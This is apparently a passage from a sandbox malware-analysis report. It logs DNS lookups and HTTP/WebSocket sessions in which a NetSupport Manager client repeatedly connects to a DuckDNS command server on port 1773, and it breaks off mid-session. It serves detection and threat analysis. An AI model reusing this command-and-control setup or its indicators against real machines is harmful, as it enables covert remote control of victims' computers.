                                                                                        Nov 23, 2024 02:54:13.025580883 CET1.1.1.1192.168.11.200x6cefNo error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                        Nov 23, 2024 02:54:13.025580883 CET1.1.1.1192.168.11.200x6cefNo error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                        Nov 23, 2024 02:54:13.025580883 CET1.1.1.1192.168.11.200x6cefNo error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                        Nov 23, 2024 02:54:14.918279886 CET1.1.1.1192.168.11.200x51faNo error (0)megaeth1337.duckdns.org185.170.144.66A (IP address)IN (0x0001)false
                                                                                        Nov 23, 2024 02:55:20.459094048 CET1.1.1.1192.168.11.200xa258No error (0)megaeth1337.duckdns.org185.170.144.66A (IP address)IN (0x0001)false

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.11.2049745104.26.1.231803456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:54:13.156776905 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                        Host: geo.netsupportsoftware.com
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Nov 23, 2024 02:54:13.489687920 CET1094INHTTP/1.1 404 Not Found
                                                                                        Date: Sat, 23 Nov 2024 01:54:13 GMT
                                                                                        Content-Type: text/html; charset=us-ascii
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        CF-Ray: 8e6d87b08eea72b9-EWR
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        cf-apo-via: origin,host
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3mH28tc1SOOFomBZWoZLUKlnqr2uLJYLYnYiLsazuB95cS6p5gv8%2B54erWrIw15OSIpIC7953yea4PwoDT2Ly9ZsQ%2FaYsIjUEE8m06qiaeJ5f6O6BGu%2BIclbhZwsSbWZ6PHe7AMPt3CnCEBF"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=95240&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a
                                                                                        Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                                                                        Nov 23, 2024 02:54:13.489698887 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.11.2049746104.26.1.231803456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:54:13.593702078 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                        Host: geo.netsupportsoftware.com
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Nov 23, 2024 02:54:13.916568041 CET1096INHTTP/1.1 404 Not Found
                                                                                        Date: Sat, 23 Nov 2024 01:54:13 GMT
                                                                                        Content-Type: text/html; charset=us-ascii
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        CF-Ray: 8e6d87b348338c9b-EWR
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        cf-apo-via: origin,host
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ToH%2F6ReBX3KuwJRZCp2hXYx22vJxmqboG4uzh2cjDZPB1tRZKDItf5NVAvt6cO%2F2avq8kYCmW9UVvY2TjqchP5VIrSk92cjIHMGwr%2BBUY5%2BoH2CcwY79YOiSs63odFhmuyHQTiO9BFXGXAl0"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a
                                                                                        Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                                                                        Nov 23, 2024 02:54:13.916584015 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.11.2049747104.26.1.231803456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:54:14.012007952 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                        Host: geo.netsupportsoftware.com
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Nov 23, 2024 02:54:14.401854038 CET1092INHTTP/1.1 404 Not Found
                                                                                        Date: Sat, 23 Nov 2024 01:54:14 GMT
                                                                                        Content-Type: text/html; charset=us-ascii
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        CF-Ray: 8e6d87b5d99a0f81-EWR
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        cf-apo-via: origin,host
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tOS5fJQ5PrEyHP%2BsaKXZpwDr5%2F13GoXC7jk8Co51P7CSFExPrBNpuBaWwKXjtu6rEkJMmLBfKBQse0xowQbgJU1gAnyzuHjLB8ekYoOhsaRWOlBuVWOvt2gTPm2FT1dRbQpPXTYE2kL0bvyD"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94587&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a
                                                                                        Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                                                                        Nov 23, 2024 02:54:14.401865959 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.11.2049748185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:54:15.166377068 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: tRPuzWtXaHbQaT2zVo4LtA==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:54:15.375292063 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: 9+b3LgojI+VGKrx00NR+Pkp+iU8=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.11.2049750185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:20.675120115 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: KMCB/AAEvXXZkktXZbBj1g==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:20.885466099 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: 9LFZfxhTGKXCHZyR+7EsFd0IGWo=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.11.2049751185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:21.892942905 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: m9kJK3waO5m0WUa27vHefw==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:22.108736038 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: b0GES8mmvOgVXztMXbAGYL2TuJY=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.11.2049752185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:22.994482040 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: C/hxaKHuYS2UrlHQxKR4gw==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:23.203349113 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: SBWPnimIbw9Euch0iEWqzZW5FAs=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.11.2049753185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:24.155714035 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: caubgnS+MZny0vR9bbg5RA==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:24.365861893 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: yEFQqbbjwWlxkFtEuMwjc3RgnAU=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.11.2049754185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:25.326414108 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: +CDSFNozeAu5QKVlY2hWAg==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:25.541098118 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: 0os0xeaK06ZIjbcvvJKCpgUtDMA=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.11.2049755185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:26.468266010 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: OfCHRkExSmfSkhIE1dUXPg==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:26.678272009 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: kUKgnlDk6cMydOvehd6RfNS+0yo=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.11.2049756185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:27.683854103 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: PfOAU8IQZJ/Yqwf/t/iX7A==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:27.895344973 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: 7kfn/2tOKnqSvWIDIjwAbMmtGGI=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.11.2049757185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:28.899326086 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: sMjNo1lKJO+LEGT7L1NgIg==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:29.108091116 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: apWKOsl8jBa+n9yWEdG3GE+8uOE=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.11.2049758185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:30.174870968 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: QT+MbphHbppMnfmijWU4Nw==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:30.385309935 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: TsxMTTyzTCHPEHl3ftumdZYj7+8=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.11.2049759185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:31.405843973 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: iAsO0TcHuUy74Pc0cvo9HA==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:31.619908094 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: 3aYM8x6PMiPPPg7xYT4DnsLgFk0=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.11.2049760185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:32.527177095 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: t3jhEwhGRFSK21cuDwXKUw==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:32.741940975 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: onO9klWqcFT3qMdlAIJbTO3/ZX8=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.11.2049761185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:33.715447903 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: nh1sF2oxMIjiKKn9/K1PEg==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:33.925350904 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: wyG1IARf4ogR3PWjxLjBes1rsSw=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.11.2049762185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:34.877552032 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: 5lgUaUu7TuCWROAY5ZCpFQ==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:35.087372065 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: VVYLA7hA9Escs6hM79xTEfiu+XI=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.11.2049763185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:35.978373051 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: blIshCnQwM5gx0hXZZVItg==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:36.188447952 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: 6vhvcCojjTJSa+lNBOPy9nVCilI=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.11.2049764185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:37.064203024 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: J+H1KaKb9G3hAhTlcn7hzQ==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:37.273241997 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: lDd8JGle80KgGdMhC6dUGm70s8A=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.11.2049765185.170.144.6617733456C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:38.318128109 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: Nn8Rhd+1HFurNpMaG8R20g==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:38.525882959 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: cuv5yGpukidHX4EV9lPNDZkr6h4=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        20192.168.11.2049766185.170.144.661773
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:39.432845116 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: qih66MhM77p0E5xPbe9BTg==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:39.642514944 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: i6G1niayAqnS8/GhBl7QdhvqCXw=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        21192.168.11.2049767185.170.144.661773
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:40.546019077 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: +EYqtX5iKFS1ntG4M95OBg==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:40.757194996 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: VYGowUX2wMw9wZcu8e/mqbyoN8k=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        22192.168.11.2049768185.170.144.661773
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:41.723135948 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: D4v6s99lRBPXYCfc8h/2uw==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:41.933751106 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: hyuLhbgiBL2Fbuf4DAHjD+PQnco=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        23192.168.11.2049769185.170.144.661773
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 23, 2024 02:55:42.849035025 CET203OUTGET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: lCV+TupX3ptsyHMqBQa7VQ==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
                                                                                        Nov 23, 2024 02:55:43.059475899 CET129INHTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
